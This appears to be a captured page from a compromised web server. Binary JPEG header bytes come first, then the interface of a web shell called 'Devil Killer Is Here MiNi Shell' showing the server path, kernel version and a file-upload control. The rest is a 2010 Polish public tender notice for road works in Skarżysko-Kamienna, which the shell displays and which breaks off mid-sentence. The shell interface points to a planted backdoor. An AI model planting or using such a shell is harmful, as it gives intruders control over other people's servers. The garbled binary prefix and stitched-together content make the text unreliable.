JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100524/141880-N-2010.html

<p class="kh_header"><b>Skarżysko-Kamienna: Rozbudowa ul. Krasińskiego i ul. Armii Krajowej
wraz z budową małego ronda w Skarżysku-Kamiennej</b><br>
<b>Numer ogłoszenia: 141880 - 2010; data zamieszczenia: 24.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Skarżyski reprezentowany przez Zarząd Dróg Powiatowych , ul. Konarskiego 20, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2524451, faks 041 2524451.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa ul. Krasińskiego i ul. Armii Krajowej
wraz z budową małego ronda w Skarżysku-Kamiennej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa ul. Krasińskiego i ul. Armii Krajowej wraz z budową małego ronda w Skarżysku-Kamiennej.
a) w zakresie robót drogowych:

 Zakres rozbudowy obejmuje następujące odcinki ulic:
-	ul. Armii Krajowej od km 0 + 000,00 do km 0 + 712,00
ul. Krasińskiego od km 0 + 000,00 do km 0 + 194,00
ul. Konarskiego od km 0 + 000,00 do km 0 + 076,50
ul. Konarskiego wylot od km 0 + 000,00 do km 0 + 037,00
ul. Powstańców Warszawy od km 0 + 000,00 do km 0 + 069,00
ul. Wiejska od km 0 + 000,00 do km 0 + 056,50
Projekt w swoim zakresie obejmuje wykonanie:
nawierzchni jezdni i wlotów małego ronda wraz z pierścieniem wyspy środkowej
nakładki bitumicznej w celu wzmocnienia istniejącej nawierzchni 18 cm beton asfaltowy  + 20cm recykling cementem MC
nawierzchni ulicy osiedlowej obok banku z kostki brukowej grubości 8 cm
na podbudowie z tłucznia kamiennego
ustawienia krawężnika betonowego o wymiarach 20x30x100 cm na ławie betonowej  z oporem
ustawienia krawężnika kamiennego o wymiarach 20x30x100 cm na ławie betonowej  z oporem połączenie pierścienia z jezdnią ronda
ustawienia krawężnika o wymiarach 15x30x100 cm na ławie betonowej zwykłej na połączeniu nawierzchni asfaltowej z nawierzchnią z kostki poszerzenia
chodników z kostki brukowej grub. 8 cm na podsypce cementowo -piaskowej grub. 5 cm
chodników wzmocnionych z kostki brukowej grub. 8 cm na podsypce cementowo - piaskowej grub. 3 cm i podbudowie z tłucznia kamiennego
zjazdów do posesji z kostki brukowej grubości 8 cm na podbudowie z tłucznia kamiennego
nawierzchni zatoki autobusowej z kostki kamiennej grubości 10 cm na podsypce cementowo - piaskowej oraz podbudowie z betonu cementowego B-20
nawierzchni parkingu Armii Krajowej-Powstańców Warszawy oraz zatoki postojowej z kostki brukowej grubości 8 cm na podbudowie z tłucznia kamiennego
ustawienia obrzeży betonowych o wymiarach 6 x 20 cm ograniczających chodnik
oznakowania pionowego i poziomego
wycinki 50szt. istniejących drzew i 14m2 krzewów
ustawienia kwiatogazonów o wymiarach 55x40x30cm
ustawienia poręczy łańcuchowej ozdobnej żeliwnej
rezerwowych rur ochronnych dla kabli energetycznych i teletechnicznych
regulacja wysokościowa studzienek istniejącego uzbrojenia


b) w zakresie robót gazowych:

Projekt obejmuje przebudowę i zabezpieczenie istniejących gazociągów wraz z włączeniem do nich  istniejącej sieci gazowej na odcinku kolizji z projektowaną przebudową jezdni ww ulic w tym:
-	Przebudowa gazociągu niskiego ciśnienia odcinek A-B-C-D dn160 PE wokół małego ronda od  strony zachodniej na długości L=107,0 m.
-	Przebudowa gazociągu niskiego ciśnienia odcinek D-D1 dn110 PE na długości 24,0 m w ul.  Powstańców Warszawy
-	Przebudowa gazociągu niskiego ciśnienia odcinek D-E-F dn110 PE wokół małego ronda od  strony wschodniej na długości L= 62,0 m.
-	Przebudowa gazociągu niskiego ciśnienia odcinek E-G-H dn110 PE wzdłuS północnej strony  ul. Armii Krajowej na długości L=149,0 m
-	Przebudowa przyłącza niskiego ciśnienia do budynku odcinek C-C1 dn 40 PE na długości  L=19,0 m
-	Zabezpieczenie rurą osłonową stalową O 250 istniejącego gazociągu stalowego O 150 w ulicy  Krasińskiego na odcinku zatoki autobusowej długości L= 38.0 m
-	Zabezpieczenie rurą osłonową stalową O 250 istniejącego gazociągu stalowego O 150 w ulicy  Krasińskiego na odcinku wjazdu długości L= 8.0 m.

c)  w zakresie kanalizacji deszczowej:
 przebudowa istniejącego układu odwodnienia  polegać będzie na:
- pozostawieniu istniejących kanałów deszczowych
- likwidacji przykanalików deszczowych i wpustów
- wybudowanie nowych studzienek połączeniowych
- wybudowanie nowych wpustów deszczowych i przykanalików
d) w zakresie robót elektrycznych
Zakresem projektu wykonawczego objęto:
demontaż istniejącej linii elektroenergetycznej niskiego napięcia, zasilającej
odbiorców komunalnych, zamieszkałych wzdłuż ulic Krasińskiego i Armii Krajowej,
jak również służącej do oświetlenia w/w ulic;
korektę przebiegu istniejących linii kablowych średniego i niskiego napięcia wraz
z zabudową dodatkowych rur osłonowych;
korektę trasy linii napowietrznych niskiego napięcia zlokalizowanych wzdłuż ulic
Konarskiego i Powstańców Warszawy;
ułożenie linii światłowodowej służącej do zasilenia kamery monitoringu
skrzyżowania ulic Piłsudskiego i Krasińskiego,
budowę linii oświetlenia ulic Krasińskiego i Armii Krajowej, na odcinku od ulicy
Piłsudskiego do ulicy Wiejskiej;
budowę linii kablowej niskiego napięcia służącej do zasilenia odbiorców
zamieszkałych wzdłuż ulic Krasińskiego i Armii Krajowej.
  Szczegółowe określenie  przedmiotu zamówienia zawiera :
	-  opis techniczny - zał. nr 9,
	-  przedmiar robót          -  zał. nr 10,
	-  szczegółowa specyfikacja techniczna - zał. nr 11 
	
	Wykonawca robót zobowiązany jest w szczególności do:
	-	urządzenia placu budowy we własnym zakresie i na koszt własny oraz zabezpieczenia terenu na którym wykonywane będą prace.
	-	zapewnienie dozoru, a także właściwych warunków bezpieczeństwa i 		higieny pracy,
	-	prowadzenia robót zgodnie z przepisami bhp i p.poż.,
	-	usuwania na bieżąco zbędnych materiałów, odpadów i śmieci oraz 		uporządkowania terenu budowy po zakończeniu robót i przekazania 		go Zamawiającemu w dniu ostatecznego odbioru.

	       Przedmiot zamówienia będzie realizowany zgodnie z postanowieniami i na 	warunkach określonych w projekcie  umowy stanowiącym zał. nr 5. 
Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone ww dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o odrzuceniu oferty z powodu nierównoważności zaproponowanych zamienników
Wspólny Słownik Zamówień (CPV): Kody CPV: 45233120-6 - roboty w zakresie budowy dróg; 45233140-2 - roboty drogowe ; 45233252-0 roboty w zakresie nawierzchni ulic; 45231300-8 roboty budowlane w zakresie budowy wodociągów i rurociągów poodprowadzania ścieków; 45232130-2 roboty budowlane                         w zakresie rurociągów do odprowadzania wody; 45231220-3 roboty budowlane              w zakresie gazociągów; 45310000-3 roboty instalacyjne elektryczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>50 %</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.40-2, 45.23.32.52-0, 45.23.13.00-8, 45.23.21.30-2, 45.23.12.20-3, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda wniesienia wadium w kwocie  10.000,00  zł. przed upływem terminu składania ofert w jednej z form określonych w art. 45 ust. 6 Pzp, czyli w:
	1	pieniądzu;
	2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
oszczędnościowo-kredytowej, z ty że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3	gwarancjach bankowych;
	4	gwarancjach ubezpieczeniowych;
	5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 
5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42,poz. 275 ).
W przypadku wniesienia wadium w pieniądzu wykonawca wpłaca wadium przelewem na rachunek bankowy Zarządu Dróg Powiatowych w Skarżysku-Kamiennej nr:
	42 1240 1402 1111 0000 1201 7616
z dopiskiem Wadium przetargowe na zadanie pn. Rozbudowa ul. Krasińskiego                          i ul. Armii Krajowej  wraz z budową małego ronda w Skarżysku-Kamiennej
 Zamawiający postuluje załączenie do oferty potwierdzonej kopii 
dokumentu stwierdzającego dokonanie przelewu na rachunek bankowy zamawiającego. W przypadku wniesienia wadium w innej formie wykonawca załącza do oferty kopię dokumentu stwierdzającego wniesienie wadium i załącza oryginał tego dokumentu w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty.
	
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze  oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem ust. 4 a Pzp. ( art. 46 Pzp ).

Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa  w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe                  z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał roboty budowlane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączy dokument potwierdzający, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  tj.:  wykonał co najmniej:
a.	dwie  roboty budowlane polegające na budowie, przebudowie lub rozbudowie drogi o nawierzchni                    z mieszanek mineralno bitumicznych SMA o powierzchni minimum 2.000 m2;
b.	jedną robotę budowlaną polegającą na budowie lub przebudowie linii  elektroenergetyczne;j           
c.	jedną robotę budowlaną polegającą na  budowie lub przebudowie infrastruktury telekomunikacyjnej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, że:

a.	dysponuje lub przedstawi  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  tj.: wskaże co najmniej jedną osobę, która będzie uczestniczyć w wykonywaniu zamówienia posiadającą uprawnienia budowlane bez ograniczeń w zakresie kierowania i nadzorowania robót w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane   lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w specjalności: 
-	drogowej (kierownik budowy)
-	instalacyjnej w zakresie sieci, instalacji                                     i urządzeń cieplnych, wentylacyjnych, gazowych , wodociągowych i kanalizacyjnych (kierownik robót). 
-	instalacyjnej w zakresie sieci, instalacji                         i urządzeń elektrycznych i  elektroenergetycznych ( kierownik robót)
-	telekomunikacyjnej (kierownik robót).

b.	przedłoży oświadczenie, że wskazane osoby posiadają wymagane uprawnienia budowlane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.	Zmiany dotyczące zakresu robót
1.	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu                                              
umowy wykonanie robót dodatkowych koniecznych (roboty, które przewidziane były w projekcie budowlanym, ale  nie zostały uwzględnione w projekcie wykonawczym lub przedmiarze robót, bądź też wynikają one z rozbieżności pomiędzy tymi dokumentami)  oraz robót zamiennych (tzw. rozwiązania zamienne, które mogą być wprowadzane w stosunku do przewidzianych w dokumentacji projektowej, ale nie będą wykraczać poza zakres zamówienia, powodować istotnego zwiększenia wynagrodzenia wykonawcy oraz będą korzystne dla Zamawiającego; konieczność ich wykonania musi być potwierdzona przez projektanta), jeżeli jest to niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i przepisami prawa wykonania przedmiotu umowy. 2. Zamawiający dopuszcza także ograniczenie zakresu rzeczowego w sytuacji, gdy wykonanie danych zwanych robotami zaniechanymi będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i przepisami prawa wykonania przedmiotu umowy bądź też z innych nieprzewidzianych przyczyn. 3. Roboty dodatkowe konieczne oraz roboty zamienne a także roboty zaniechane mogą być wykonywane (lub zaniechane) wyłącznie  na podstawie protokółu konieczności sporządzonego przez przedstawicieli Zarządu Dróg Powiatowych oraz Wykonawcy przy udziale inspektora nadzoru inwestorskiego. Protokół wymaga akceptacji Zarządu Powiatu. 4. Przed rozpoczęciem wykonywania robót, o których mowa w pkt. 1 wykonawca dokona ich wyceny zgodnie z postanowieniami § 11 ust. 4 umowy oraz  przedstawi Zamawiającemu do akceptacji wysokość wynagrodzenia wynikającą ze zmian przed rozpoczęciem robót wynikających z tych zmian.  5. Wystąpienie okoliczności opisanych w 